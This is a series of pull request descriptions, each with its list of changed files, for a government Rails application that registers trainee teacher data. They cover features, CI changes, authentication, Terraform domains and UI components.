app.json
package.json

We shouldn't stress over using the exact version of node js as long
as we are using version 12 we should be alright.
It also means that Heroku review apps will work because Heroku build pack
does not use the latest LTS version.

Relax NodeJS version restrictions in package.json

---

.github/workflows/build.yml
Rakefile
app/controllers/trainees_controller.rb
app/webpacker/packs/application.js
app/webpacker/packs/govuk_assets_import.js
babel.config.js
lib/tasks/govuk_lint.rake
package.json
postcss.config.js
spec/factories/trainees.rb
yarn.lock

- Add Standard JS as a dev dependency
- Add Standard JS to our pipeline
- fixes initial issues identified by Standard JS
- Split up the build step into tests/linting etc so that its easy to identify which one failed
- Remove unnecessary `application.css`

Add Standard JS and use it as a our linting tool

---

Gemfile
Gemfile.lock
app/controllers/trainees/previous_education_controller.rb
app/controllers/trainees_controller.rb
app/views/layouts/application.html.erb
app/views/trainees/previous_education/index.html.erb
config/routes.rb
db/migrate/20200901113117_add_previous_education.rb
db/schema.rb
spec/controllers/trainees/previous_education_controller_spec.rb
spec/controllers/trainees_controller_spec.rb
spec/factories/trainees.rb

- https://trello.com/c/3CF50Pm6/25-add-previous-education-form
- Ability to add previous education data to trainee
- Adds new page with form for previous education data entry
- Adds and uses faker in factories
- Adds migration for previous education
- Create or find an existing trainee
- Update their previous education info
- Look in database, values should reflect new values
View https://dfe-twd-rttd-pr-14.herokuapp.com/trainees/1/previous-education

[25] Able to add previous education to trainee

---

app/presenters/trainee_contact_details.rb
app/views/trainees/show.html.erb
config/locales/en.yml
spec/components/summary_table_component_spec.rb
spec/features/trainees/trainee_summary_spec.rb
spec/presenters/trainee_contact_details_spec.rb
spec/support/page_objects/sections/contact_details.rb
spec/support/page_objects/trainees/summary_page.rb

- https://trello.com/c/BG86E5mD/24-s-add-contact-details-summary
- Implements the trainee contact details summary
- Fire up localhost, load the trainee summary
- Add address details
- Assert address details are displayed in the summary

[24] - Implement trainee contact details summary

---

app/presenters/trainee_course_details.rb
app/views/trainees/show.html.erb
spec/features/edit_course_details_spec.rb
spec/support/page_objects/sections/course_details.rb
spec/support/page_objects/trainees/summary_page.rb

Update to the summary page.
* Add course details section to summary page
* Refactor edit course details feature spec and add expectation for
summary
I've added an expectation to the edit course details feature spec rather than the summary page feature spec. 'Edit course details' seems more like 'the feature' than 'a summary page'. The expectation is only for one value at this point as that page will likely be redesigned next week.

[30] add course details summary

---

config/application.rb
spec/components/previews/summary_table_component_preview.rb

We will be building more components and we need a way to view components
and the various states which those components could be in.
- Adds preview feature for view components
To review components just add `/rails/view_components` to the url in this case https://dfe-twd-rttd-pr-34.herokuapp.com/rails/view_components

Setup view component previews

---

.github/workflows/build.yml
config/application.rb
spec/components/previews/summary_table_component_preview.rb
spec/features/trainees/creating_a_new_trainee_spec.rb

We’ve got a bit of an issue with the Rubocop lint task running in CI. It’s set to auto-correct but those corrected files won’t be committed so there’s a bit of a false positive in that it passes the CI but those offending files creep into `master`. 
- Edit the CI build yaml file to explicitly fail Rubocop lint violations
- `./bin/rake` would still auto-correct locally

Remove autocorrect option from Rubocop lint

---

app/controllers/trainees_controller.rb
app/presenters/trainee_contact_details.rb
app/views/trainees/contact_details/edit.html.erb
config/locales/en.yml
db/migrate/20200907121550_rename_trainees_phone_field.rb
db/schema.rb
spec/factories/trainees.rb
spec/features/trainees/trainee_summary_spec.rb
spec/presenters/trainee_contact_details_spec.rb
spec/support/page_objects/sections/contact_details.rb

- Builds on the discussion from https://github.com/DFE-Digital/register-trainee-teacher-data/pull/26#discussion_r484273202
- Rename trainee `phone` to `phone_number` and update relevant files
- Nothing significant to review locally other than the fact that the phone number field is displayed correctly on the summary page

Update trainee phone to phone_number

---

spec/features/edit_course_details_spec.rb
spec/features/trainees/creating_a_new_trainee_spec.rb
spec/features/trainees/edit_course_details_spec.rb
spec/features/trainees/trainee_summary_spec.rb
spec/features/trainees/viewing_an_existing_trainee.rb
spec/features/view_pages_spec.rb
spec/support/page_objects/base.rb
spec/support/page_objects/base_page.rb
spec/support/page_objects/home.rb
spec/support/page_objects/trainees/course_details.rb
spec/support/page_objects/trainees/create.rb
spec/support/page_objects/trainees/index.rb
spec/support/page_objects/trainees/new.rb
spec/support/page_objects/trainees/show.rb
spec/support/page_objects/trainees/summary.rb
spec/support/page_objects/trainees/training_details.rb

The 'Page' suffix is redundant e.g. `PageObjects::ShowPage`
Remove it -> e.g. `PageObjects::Show`.

Rename page objects

---

README.md
app/controllers/application_controller.rb
app/controllers/concerns/basic_authenticable.rb
config/settings.yml
config/settings/development.yml
config/settings/production.yml
config/settings/test.yml

- https://trello.com/c/HSd8hrXs/8-s-add-basic-auth-to-protect-the-app-in-deployed-envs
- Implement basic auth singleton to protect against non-prod environments
- Bundle https://github.com/rubyconfig/config to manage app Settings
- Setup env specific yamls for handling settings per environment
- Set `basic_auth_required: true` in your local `yaml` settings file
Assert prompted with browser http auth prompt when visiting `localhost:3000/trainees/new`

[8] Implement basic auth

---

app/controllers/heartbeat_controller.rb
config/routes.rb
spec/requests/heartbeat_spec.rb

- View the last commit in this PR and ignore the others which relate to another PR.
- Visit https://dfe-twd-rttd-pr-31.herokuapp.com/ping displays `PONG`
- Visit https://dfe-twd-rttd-pr-31.herokuapp.com/healthcheck - NB redis and sidekiq are returning false because the review app is on heroku and we haven't configured it yet.
- Testing it locally should return true for all of the checks

[91] Add ping/healthcheck endpoints

---

Gemfile
Gemfile.lock
app/controllers/trn_submissions_controller.rb
app/models/dttp_id_not_returned_error.rb
app/models/locked_attribute_error.rb
app/models/trainee.rb
app/services/dttp/access_token_service.rb
app/services/dttp/client.rb
app/services/dttp/contact_service/create.rb
app/views/trainees/show.html.erb
app/views/trn_submissions/show.html.erb
app/webpacker/styles/application.scss
config/routes.rb
config/settings.yml
config/settings/test.yml
db/migrate/20200914163852_add_dttp_id_to_trainees.rb
db/schema.rb
spec/controllers/trn_submissions_controller_spec.rb
spec/features/trainees/submit_for_trn_spec.rb
spec/models/trainee_spec.rb
spec/rails_helper.rb
spec/services/dttp/access_token_service_spec.rb
spec/services/dttp/client_spec.rb
spec/services/dttp/contact_service/create_spec.rb
spec/support/page_objects/trainees/summary.rb
spec/support/page_objects/trainees/trn_success.rb

Once an initial trainee record is 'complete' we are going to send it to DTTP where it will be persisted and sent to downstream consumers. This will form the process by which we obtain a Teacher Reference Number (supplied by DQT asynchronously and added back to DQT). This PR adds a button and sets the patterns to use when we interact with DTTP. The implementation is intentionally bare bones at the moment and just sends first names, last name and ID to DTTP. We will flesh this out with the other fields and additional entities (we only interact with the `Contact` entity set here).
UPDATE: This PR has been updated to set the `Trainee#dttp_id` from the value sent back from DTTP in the header when the create request is made.
* Add the button and a simple success page to the UI
* Add a service …

[41] Implement bare bones 'Submit for TRN' button

---

.gitignore
app/services/dttp/access_token_service.rb
config/environments/development.rb
config/environments/production.rb
spec/services/dttp/access_token_service_spec.rb

- https://trello.com/c/a8iszbjM/116-m-add-token-cacheing-to-dttpaccesstokenservice
- Activate `:file_store` as the cache store for dev and prod
- Wrap the network request in a `Rails.cache` so it's only fired if there's a cache miss.  
- Run `bundle exec {rails|rake} dev:cache` locally to enable caching in developmnent. This will create a file `tmp/caching-dev.txt` which Rails uses to toggle caching on/off for development.
- Load up a rails console and run `Dttp::AccessTokenService.call` (make sure you've filled out the connection settings in your yaml) and you should get back a token. Fire the command again and it should return the same token
Make sure you run `bundle exec {rails|rake} dev:cache` to turn off the dev caching locally when finished. I've tested the expiry when using …

[116] - Cache the dttp access token

---

app/controllers/trn_submissions_controller.rb
app/presenters/dttp/trainee_presenter.rb
app/services/dttp/contact_service/create.rb
spec/controllers/trn_submissions_controller_spec.rb
spec/presenters/dttp/trainee_presenter_spec.rb
spec/services/dttp/contact_service/create_spec.rb

- https://trello.com/c/S6xNozZ5/137-m-add-trainee-presenter-for-dttp
- Replaces the `trainee` active_record model passed into `ContactService::Create` with a presented version
- Handles all currently stored attributes on the Contact entity minus the look up ones.
I've referenced the RTTD - New Data Standard v1.1 but the following fields (which we currently have in the schema) are not added to the presenter as they're look up fields:
- `disability` - no matching d365 field at the moment
- `nationality`
- `ethinicity`
- Fire up a  rails console
- Run the following `Dttp::ContactService::Create.call(trainee: data)` where `data` is the result of `Dttp::TraineePresenter.new(trainee: {trainee_object})`
- Assert the payload is sent correctly
Depends on …

[137] Add trainee presenter for dttp

---

Gemfile
Gemfile.lock

This gem is already used and imported by `govuk-components` as a dependency

Remove view_component gem

---

app/components/task_list/script.js
app/components/task_list/style.scss
app/components/task_list/view.html.erb
app/components/task_list/view.rb
app/views/layouts/application.html.erb
app/views/trainees/show.html.erb
spec/components/task_list/view_preview.rb
spec/components/task_list/view_spec.rb
spec/features/edit_course_details_spec.rb
spec/features/trainees/creating_a_new_trainee_spec.rb
spec/features/trainees/trainee_summary_spec.rb

- Adds new TaskList component
- Refactors the trainees show page to use the TaskList component and bring it inline with prototype
- Go to https://dfe-twd-rttd-pr-58.herokuapp.com/trainees , Click on the "Add data..." button, complete the page and see the overview page after clicking on "Continue"
- View existing record https://dfe-twd-rttd-pr-58.herokuapp.com/trainees/1
- View the new TaskList Component - 2 examples can be found by clicking on these links https://dfe-twd-rttd-pr-58.herokuapp.com/view_components/task_list/view

[162] Build "Add a trainee" overview page

---

Gemfile

Dependabot can't read `.ruby-version` or `.tool-versions`, see https://github.com/dependabot/dependabot-core/issues/1033
Hardcode ruby version in Gemfile
🚢

[232] Hardcode ruby version in gemfile

---

config/webpacker.yml

Hit an issue with testing after a version bump for webpacker https://github.com/DFE-Digital/register-trainee-teacher-data/pull/65
Changed `resolved_paths` to `additional_paths` as it's deprecated

Change additional paths in webpacker

---

app/controllers/trainees_controller.rb
app/models/trainee.rb
app/views/trainees/new.html.erb
spec/models/trainee_spec.rb

* https://trello.com/c/7cREOM2M/206-add-validation-to-record-setup-page
Validations for record set up page. This is branching off https://github.com/DFE-Digital/register-trainee-teacher-data/pull/61 
Validations that render error messages for not selecting a route type or entering a trainee id over 100 characters long. Does not have validation for uniqueness as per ticket. 
Check review app

[206] Add validation to record setup page

---

app/controllers/trainees/personal_details_controller.rb
app/forms/personal_details_form.rb
app/models/personal_detail.rb
app/services/personal_details/update.rb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/show.html.erb
config/locales/en.yml
config/routes.rb
spec/features/trainees/edit_personal_details_spec.rb
spec/models/personal_detail_spec.rb
spec/services/personal_details/update_spec.rb
spec/support/page_objects/trainees/personal_details.rb

- https://trello.com/c/vtzaPbHw/193-spike-validations-for-trainee-sections
- Refactor the personal detail routes
- Handle personal detail editing in its own controller (treat it as a separate resource)
- Introduce an `ActiveModel` object to validate personal detail fields in isolation to other sections
- Visit the review app https://dfe-twd-rttd-pr-64.herokuapp.com/
- Skip filling out trainee details initially
- Navigate to the personal details section and try to continue without filling out any details
- Assert validations are triggered
Depends on https://github.com/DFE-Digital/register-trainee-teacher-data/pull/60

[193] Validations for personal details section

---

app/views/trainees/personal_details/edit.html.erb

On the personal details page, when a user did not select a gender and
tried to click on the link in the error summary, the users focus would
not be set to the first option for the gender field.
- Visit https://dfe-twd-rttd-pr-97.herokuapp.com/trainees/1/personal-details, 
- fill in all the details except for the gender and click save.
- Click on the error summary link at the top of the page.
- page scrolls down to gender and the first option gets the yellow focus.

[xxx] Fix error summary link focus

---

.github/workflows/build.yml

Changing from the use of set-env to $GITHUB_ENV; as set-env is about to be depreated.
This will also stop the warning from appearing.
Changing from the use of set-env to $GITHUB_ENV; as set-env is about to be depreated.

[419] Use GITHUB_ENV instead of set_env

---

spec/requests/heartbeat_spec.rb

```.................................DEPRECATION WARNING: Rails 6.1 will return Content-Type header without modification. If you want just the MIME type, please use `#media_type` instead. (called from block (4 levels) in <main> at ~/repos/DfE/register-trainee-teacher-data/spec/requests/heartbeat_spec.rb:38)
............................*...............................................................................***...............```
```..........................................................................................................................................***.......*..........```
:shipit:

[xxxx] Fixed the DEPRECATION WARNING

---

app/components/page_title/view.html.erb
app/components/page_title/view.rb
app/views/layouts/application.html.erb
app/views/pages/start.html.erb
app/views/trainees/confirm_details/show.html.erb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/degrees/edit.html.erb
app/views/trainees/degrees/new.html.erb
app/views/trainees/diversity/disclosures/edit.html.erb
app/views/trainees/index.html.erb
app/views/trainees/new.html.erb
app/views/trainees/not_supported_route.html.erb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/show.html.erb
app/views/trainees/training_details/edit.html.erb
app/views/trn_submissions/show.html.erb
config/locales/en.yml
spec/components/page_title/view_preview.rb
spec/components/page_title/view_spec.rb
spec/features/view_pages_spec.rb

https://trello.com/c/dbEPQ9Bo/233-m-update-page-titles-to-all-pages
One issue is for pages that don't have a clear `h1` tag on the page don't have a clear title that would be suitable - an example being the /trainees/1/course-details page.
* Add page heading component, and replace h1 headings on pages where appropriate
* Add new locales info for each page heading

233 Create page heading component

---

.github/workflows/build.yml
terraform/modules/paas/main.tf
terraform/modules/paas/variables.tf
terraform/terraform.tf
terraform/variables.tf

see https://docs.docker.com/docker-hub/download-rate-limit/
Make PaaS authenticate with DockerHub before pulling image.
https://trello.com/c/qG7Lio3h/365-pipeline-and-arm-template-changes-to-include-dockerhub-credentials-to-overcome-rate-limit

Authenticate with DockerHub to pull image

---

app/controllers/trainees/degrees_controller.rb
spec/controllers/trainees/degrees_controller_spec.rb
spec/features/trainees/degrees/adding_degree_spec.rb

When a degree has been created the user is redirected to the confirm page.
https://trello.com/c/s7vr81ZY/369-create-degree-should-redirect-to-confirm-page
Change redirect URL

[369] Fix Trainees::DegreesController#create

---

app/components/form_components/autocomplete/script.js
app/components/form_components/autocomplete/style.scss
app/components/form_components/autocomplete/view.html.erb
app/components/form_components/autocomplete/view.rb
app/views/trainees/degrees/_non_uk_degree_form.html.erb
app/views/trainees/degrees/_uk_degree_form.html.erb
package.json
spec/components/form_components/autocomplete/view_preview.rb
spec/components/form_components/autocomplete/view_spec.rb
yarn.lock

The idea with this component is that it would be used within a form.
Instead of the component trying to build out the select list and include
all the styling for the default select list, it was decided that it's best
to pass in a string of html. A div is wrapped around the passed in html
string and returned to the view.
Any autocomplete config options you would like to apply to the component
can be added by using the `classes` or `html_attributes` parameters.
`classes` takes a string that would be added to the parent div container.
`html_attributes` takes a hash which gets added to the parent div container
At the moment the only autocomplete options supported are:
- defaultValue
- showAllValues
It should be easy to add extra autocomplete options by adding the
option lookup to script.js …

[245] SPIKE Adding Autocomplete select fields

---

spec/features/view_pages_spec.rb
spec/support/page_objects/start.rb
spec/support/page_objects/trainees/index.rb
spec/support/page_objects/trainees/new.rb
spec/support/page_objects/trainees/not_supported_route.rb

https://trello.com/c/wkIZc6F9/377-s-rename-all-site-prism-object-elements-from-pagetitle-to-pageheading
Changed the site prism page_title tag to page_heading for heading elements

377 Change site prism page heading tag

---

.github/workflows/build.yml
spec/spec_helper.rb

- Adds `COVERAGE` environment to Github action step so code coverage is checked after the tests are run and should fail if they drop the currently 86% mark. The test will fail if they do drop and block the PR from being merged
Example of a failed PR Github Action
https://github.com/DFE-Digital/register-trainee-teachers/pull/141/checks?check_run_id=1353502545#step:12:55
- PR will be rebased before merging

[376] enabled code coverage in CI

---

.github/workflows/build.yml
.github/workflows/deploy.yml

Currently, we use single workflow file in building and deploying.
The idea here is to split the single workflow file along specific jobs tasks e.g. build , test, deploy etc

split workflow file

---

.github/workflows/build.yml
Dockerfile
app/controllers/heartbeat_controller.rb
config/routes.rb
spec/requests/heartbeat_spec.rb

Sometimes it's crucial to know what the latest commit is in the deployed env.
Add a `/sha` endpoint which returns the SHA of the latest commit that's deployed out.
~~The SHA returned in `/sha` should match the latest commit. EZ!~~
Nope, not so EZ. This is failing in the preview app, probably because Heroku doesn't use the Docker image to deploy but relies on taking the version straight from Git. 🤦

[429] add sha endpoint

---

app/components/trainees/confirmation/programme_details/view.rb
app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees/programme_details_controller.rb
config/routes.rb
spec/components/trainees/confirmation/programme_details/view_spec.rb
spec/features/trainees/edit_programme_details_spec.rb

https://trello.com/c/MAQqgkeA/353-s-confirm-trainee-programme-details-page
* Added a confirmation page and summary card after the edit programme details section

353 Add edit programme details confirmation page

---

Gemfile
Gemfile.lock
app/controllers/application_controller.rb
app/controllers/trainees_controller.rb
app/policies/trainee_policy.rb
spec/policies/trainee_policy_spec.rb

Trainees are associated with a provider and a user from a provider should only be able to see the trainees that they are associated with.
* Install Pundit
* Add a policy scope for trainees that restricts access

[384] Scoping trainees to current user

---

app/controllers/trainees/diversity/base_controller.rb
app/controllers/trainees/diversity/disability_details_controller.rb
app/controllers/trainees/diversity/disability_disclosures_controller.rb
app/controllers/trainees/diversity/disclosures_controller.rb
app/controllers/trainees/diversity/ethnic_backgrounds_controller.rb
app/controllers/trainees/diversity/ethnic_groups_controller.rb
app/models/diversities/diversity_flow.rb
app/views/trainees/show.html.erb
config/locales/en.yml
spec/features/trainees/diversities/diversity_progress_spec.rb
spec/models/diversities/diversity_flow_spec.rb
spec/support/page_objects/sections/diversity.rb
spec/support/page_objects/trainees/summary.rb

- Add progress/state tracking for the diversity section
- Since this section has a few different scenarios, we need to be able to show the right status for each situation. I've created an ActiveModel PORO, as a sort of wrapper, which conditionally validates each section depending on what information has been provided. 
This should for eg return `completed` if the trainee has not disclosed diversity information but still marked the section as completed etc. 
- Visit the review app - https://dfe-twd-rttd-pr-171.herokuapp.com/
- Head to the diversity section and attempt a few scenarios:
1) Not disclosing information
2) Disclosing info with no background but with disabilities 
3) etc
Assert that the status is shown correctly for …

[440] - Add progress/state for diversity section

---

config/initializers/assets_cache_header.rb

None of our assets were being cached by the browser because cache-control
was not being set. I set it to 1 year because our assets use a cache
busting technique so if we were to update their content the filename would
be different and therefore the browser would fetch and use the updated
assets.
Reference:
mikerogers.io/2019/11/02/how-to-set-cache-control-headers-for-rails-webpacker-and-sprockets-assets.html
Visit https://dfe-twd-rttd-pr-175.herokuapp.com/
Check all asset headers and see if cache control is set to expire in a years time

[473] Set cache control in assets header

---

terraform/modules/paas/data.tf
terraform/modules/paas/main.tf
terraform/modules/paas/variables.tf
terraform/variables.tf

Add custom domain for qa.register-trainee-teachers.education.gov.uk
* Add custom domain for qa.register-trainee-teachers.education.gov.uk
* Create new route

Add customdomain qa.register-trainee-teachers.education.gov.uk

---

terraform/modules/paas/main.tf

Create Custom Domain for Register application. This PR will crate and bind a custom route to the application. This will be along side the default route (https://register-production.london.cloudapps.digital/).
resource cloudfoundry_route web_app_service_gov_uk_route {
domain   = data.cloudfoundry_domain.register_education_gov_uk.id
space    = data.cloudfoundry_space.space.id
hostname = var.app_environment == "production" ? "www" : var.app_environment
}

Create CustomDomain for Register app in Production

---

app/controllers/trainees/programme_details_controller.rb
app/models/programme_detail.rb
app/views/trainees/show.html.erb
spec/features/trainees/edit_programme_details_spec.rb
spec/support/features/trainee_steps.rb
spec/support/page_objects/sections/programme_details.rb
spec/support/page_objects/trainees/summary.rb

- https://trello.com/c/x9qJPXb5/446-programme-details-progress-state
- Add the progress/state for the programme details section
- Visit the review app - https://dfe-twd-rttd-pr-176.herokuapp.com/
- Assert summary page shows 'Not started'
- Fill out some details but do not mark complete, assert label shows 'in progress'
- Mark complete, assert label shows 'completed'

[446] Add progress/state tracking for programme-details section

---

spec/components/personas/view_preview.rb

I noticed a weird issue on Heroku and Paas instance where the `/view_components`
page randomly produced a 500 error, after refreshing the page again it
would display only the first couple of components. I looked in the logs
and couldn't find anything explaining why this problem was happening.
I could not reproduce this in development, so it had to be an issue in production
env.
I put my local instance into production mode and dig some debugging. Deep
in the trenches, I found there was an error but it was being suppressed.
The error related to not being able to find/load the `Persona` module. It
turned out the `personas/view_preview.rb` was referencing `Persona` instead
of `Personas`.
I will feed this issue back to the view_components development team because
I would have thought this kind …

[XXX] Fix view component preview index page

---

app/components/trainees/confirmation/degrees/view.html.erb
app/components/trainees/confirmation/degrees/view.rb
app/views/trainees/check_details/show.html.erb
spec/components/trainees/confirmation/degrees/view_preview.rb
spec/components/trainees/confirmation/degrees/view_spec.rb

In some instances we might not want the degree component to give the user
and option to add additional degrees. This commit adds a `show_add_another_degree_button`
param. By default this is set to true, so that it works without having to worry
about trying to update the sections confirmation page which is generic
page which other sections use but those section confirmation components will
not have this extra param.
Visit https://dfe-twd-rttd-pr-185.herokuapp.com/view_components/trainees/confirmation/degrees/view
and check the various states the component can be in

[504] Suppress the "Add another degree" button

---

app/controllers/pages_controller.rb
app/views/layouts/application.html.erb
app/views/pages/accessibility.html.erb
app/views/pages/cookies.html.erb
app/views/pages/privacy_policy.html.erb
app/webpacker/styles/application.scss
config/locales/en.yml
config/routes.rb
spec/features/view_pages_spec.rb
spec/support/page_objects/base.rb
spec/support/page_objects/start.rb

- Replaces hardcoded footer with GOV.UK Components Footer (there is a bug with the styling of the license footer link but I have submitted a PR to fix it https://github.com/DFE-Digital/govuk-components/pull/69)
- Adds draft accessibility statement
- Adds draft cookie policy page, this will need to be reviewed once we have finished adding dfe signin or start relying on cookies for specific features
- Adds draft privacy policy
Visit https://dfe-twd-rttd-pr-180.herokuapp.com/
- Click on Accessibility link in the footer
- See the Accessibility statement page https://dfe-twd-rttd-pr-180.herokuapp.com/accessibility
- Click on Cookies link in the footer
- See the Cookies policy page https://dfe-twd-rttd-pr-180.herokuapp.com/cookies
- Click on Privacy policy link in the footer
- See the Privacy …

[501] Add Accessibility, Cookie  & Privacy Policy pages

---

app/controllers/trn_submissions_controller.rb
app/helpers/trn_submissions_helper.rb
app/views/trainees/check_details/show.html.erb
app/views/trn_submissions/show.html.erb
app/webpacker/styles/application.scss
config/locales/en.yml
spec/controllers/trn_submissions_controller_spec.rb
spec/features/trainees/submit_for_trn_spec.rb
spec/helpers/trn_submissions_helper_spec.rb
spec/support/page_objects/trainees/check_details/show.rb

- https://trello.com/c/ipVx8Hbi/460-l-review-trainee-details-before-trn-submission
- Aligns the TRN feedback page closer to the prototype
- Clean up flow from review details page to trn feedback
- The dttp values aren't mapped properly at the moment so this won't actually submit and create a contact (that's being handled in a different epic)
- You can create a trainee and review the details page
- You can manually see the trn success page by visiting `/trn_submissions/{id_of_trainee_created}`

[460] Review Trainee Details before TRN Submission

---

app/components/trainees/confirmation/diversity/view.rb
app/lib/dttp/code_sets/disabilities.rb
app/lib/dttp/code_sets/ethnicities.rb
app/presenters/dttp/trainee_presenter.rb
app/views/trainees/diversity/ethnic_backgrounds/edit.html.erb
config/initializers/diversity_enums.rb
spec/factories/trainees.rb
spec/presenters/dttp/trainee_presenter_spec.rb

https://trello.com/c/qmbXErW0/469-l-send-diversity-information-to-dttp
Update `Dttp::TraineePresenter#to_dttp_params` to include the GUID fields`_dfe_ethnicityid_value` and `_dfe_disibilityid_value`. These values make sure DTTP knows the ethnicity and disability of the trainee if disclosed.
Note: Although the app allows for multiple disabilities, we can only send one to DTTP.
Study the logic that computes the 2 new fields as there a number of rules that determines their values.

[469] Send diversity information to DTTP

---

.adr-dir
README.md
docs/adr/0001-record-architecture-decisions.md
docs/adr/0002-use-adr-tools-with-custom-template.md
docs/adr/index.md

Added using adr-tools (https://github.com/npryce/adr-tools).
Copied over from ttapi.
Add ADR framework and decisions to use ADRs.

add architectural decision records (ADRs)

---

app/controllers/trainees/programme_details_controller.rb
app/controllers/trainees_controller.rb
app/models/programme_detail.rb
app/services/programme_details/update.rb
app/services/trns/submission_checker.rb
app/views/trainees/show.html.erb
spec/features/trainees/submit_for_trn_spec.rb
spec/models/programme_detail_spec.rb
spec/services/trns/submission_checker_spec.rb

- https://trello.com/c/iwKvqYDr/519-allow-users-to-check-trainee-records-before-submitting-for-trn
- Hides the review details button on the summary page if sections haven't been completed
- Implement a service to check the progress for all sections
- Visit the trainee summary page, assert review details button is hidden
- Complete all sections, assert the review details button is shown

[519] Allow users to Check trainee records before submitting for TRN

---

app/components/tab_navigation/script.js
app/components/tab_navigation/style.scss
app/components/tab_navigation/view.html.erb
app/components/tab_navigation/view.rb
spec/components/tab_navigation/view_preview.rb
spec/components/tab_navigation/view_spec.rb

- https://trello.com/c/Zb9AOQwJ/558-tabs-component
- broken up from this ticket https://trello.com/c/zmX84s6I/463-edit-trainee-overview-details
- Implement tabs navigation view component to be re-used across different areas of the app
Default view - https://dfe-twd-rttd-pr-215.herokuapp.com/view_components/tab_navigation/view/default
With highlighted item - https://dfe-twd-rttd-pr-215.herokuapp.com/view_components/tab_navigation/view/with_current_item_highlited

[558] Implement tab component

---

app/components/application_record_card/script.js
app/components/application_record_card/style.scss
app/components/application_record_card/view.html.erb
app/components/application_record_card/view.rb
app/views/trainees/index.html.erb
spec/components/application_record_card/view_preview.rb
spec/components/application_record_card/view_spec.rb
spec/support/page_objects/trainees/index.rb

- All records should have a link to be able to navigate back to them
- Closer to what we will use 
- Does not have filter/sort/grouping
- Login https://dfe-twd-rttd-pr-214.herokuapp.com and create a few trainee and then go back to the trainees list and check they are displayed as expected
- view the different examples https://dfe-twd-rttd-pr-214.herokuapp.com/view_components/application_record_card/view

[548] - Add Application Record card component

---

app/components/trainees/confirmation/programme_details/view.html.erb
app/components/trainees/confirmation/programme_details/view.rb
app/components/trainees/record_details/view.html.erb
app/components/trainees/record_details/view.rb
app/controllers/trainees_controller.rb
app/helpers/summaries_helper.rb
app/helpers/summary_helper.rb
app/views/trainees/edit.html.erb
app/webpacker/styles/application.scss
config/locales/en.yml
config/routes.rb
spec/components/trainees/record_details/view_preview.rb
spec/components/trainees/record_details/view_spec.rb
spec/features/trainees/edit_trainee_record_spec.rb
spec/support/page_objects/sections/summaries/programme_detail.rb
spec/support/page_objects/sections/summaries/record_detail.rb
spec/support/page_objects/trainees/edit.rb

- https://trello.com/c/zmX84s6I/463-edit-trainee-overview-details
This PR sets up the foundation for editing the trainee record post trn submission to mainly display the following information:
- TRN Status
- Trainee Record overview
- Programme Details overview
There are a few things which have been broken up and will be handled in separate tickets so some information is rendered statically for now ie (trn submission information and programme detail end date will be added in other tickets)

[463] Add the trainee edit record page

---

app/views/trainees/show.html.erb
spec/features/trainees/edit_trainee_record_spec.rb

Trainee task list headings as per prototype - https://register-prototype.herokuapp.com/new-record/overview
Update headings and move degree into "About the trainee"
> All other changes will be completed in later PR's

[570] Update trainee task list headings

---

app/views/layouts/application.html.erb

Footer
- Add support content
- Remove copyright
> We have no link for the "how to register" page

[605] Add support links and remove copyright from footer

---

app/components/start_page_banner/style.scss

We have [nicked your design for the phase banner](https://github.com/DFE-Digital/apply-for-teacher-training/pull/3575) for Manage’s own start page. In return, we can contribute some bug fixes. #oneteambat
* Use light blue border colour for phase banner when shown inside start page banner
* Fix incorrect negative margin on start page banner at smaller sizes (which also hides the bottom border on the phase banner)
| Before | After |
| - | - |
| ![before](https://user-images.githubusercontent.com/813383/101020449-70c7a300-3566-11eb-89af-3528445a8873.png) | ![after](https://user-images.githubusercontent.com/813383/101020436-6d341c00-3566-11eb-8e0d-b9e7c69a2b3a.png) |

Correct negative margin on start page banner within smaller viewports

---

app/components/trainees/confirmation/degrees/view.html.erb
app/components/trainees/confirmation/degrees/view.rb
app/views/trainees/degrees/type/new.html.erb
config/locales/en.yml
spec/components/trainees/confirmation/degrees/view_spec.rb

- https://trello.com/c/HVmDSXXz/571-update-content-on-the-add-another-degree-journey-in-the-build
When no degrees but adding a new one:
When you have degrees and attempt to add a new one:
When editing a trainee record and you remove all degrees, the text on the button:
Instead of "add another degree"
- Visit https://rtt-review-pr-238.herokuapp.com/ and add a new degree, assert ui is identical to image 1
- Add another degree, assert ui is identical to image 2
- Head to https://rtt-review-pr-238.herokuapp.com/trainees/:id/edit, (replace :id with the trainee id you created) remove all degrees and assert ui is identical to image 3

[571] - Update snipets of degree content to be aware of existing degrees

---

app/components/page_title/view.rb
app/views/personas/index.html.erb
app/views/trainees/degrees/new.html.erb
app/views/trainees/degrees/type/new.html.erb
app/views/trainees/diversity/confirm_details/show.html.erb
app/views/trainees/diversity/disability_details/edit.html.erb
app/views/trainees/diversity/disability_disclosures/edit.html.erb
app/views/trainees/diversity/ethnic_backgrounds/edit.html.erb
app/views/trainees/diversity/ethnic_groups/edit.html.erb
config/locales/en.yml
spec/components/page_title/view_spec.rb

Previously, you had to provide an string in the format of an i18n look up which forced you to define your page title values in one location. This change makes it a little more flexible so that you can pass in a pre-resolved value and just render that in the tile.
- Introduces a regex matcher to match for a string in an i18n format.
Given a list of possible strings:
```
hello there # won't match
asdasdasd # won't match
aas23234 # won't match
hello.there # will match
h.my.friend # will match
hello there.friend # won't match
hello.friend.my.friend # will match
```
- Go through app and assert page titles are displaying correctly (even for confirmation pages as that was the source of broken titles)

Refactor page title component

---

app/components/start_page_banner/style.scss

The scope of `.app-start-page .govuk-link` is too broad; all links on the start page will be turned white. Currently this only effects a link in the footer, but when I applied these styles to the Manage page, most of the links on the page disappeared!
Reduce the scope of style that overrides the colour of `govuk-link`. 
| Before | After |
| - | - |
| <img width="630" alt="Screenshot 2020-12-03 at 18 04 00" src="https://user-images.githubusercontent.com/813383/101069727-4986cb00-3592-11eb-82bb-bcfcc2f232ef.png"> | <img width="620" alt="Screenshot 2020-12-03 at 18 02 18" src="https://user-images.githubusercontent.com/813383/101069723-47bd0780-3592-11eb-947c-45e7a75c2bd1.png"> |

Reduce scope of inverted link style on app start page

---

app/components/header/view.html.erb
app/controllers/application_controller.rb
app/controllers/sessions_controller.rb
app/controllers/sign_out_controller.rb
app/models/dfe_sign_in_user.rb
config/routes.rb
config/settings.yml
spec/components/header/view_spec.rb
spec/config/settings_spec.rb
spec/controllers/sessions_controller_spec.rb
spec/controllers/sign_out_controller_spec.rb
spec/requests/authentication_spec.rb
spec/services/dfe_sign_in_users/update_spec.rb
spec/support/dfe_sign_in_user_helper.rb

* https://trello.com/c/5UB3cgVo/489-s-sign-out-link
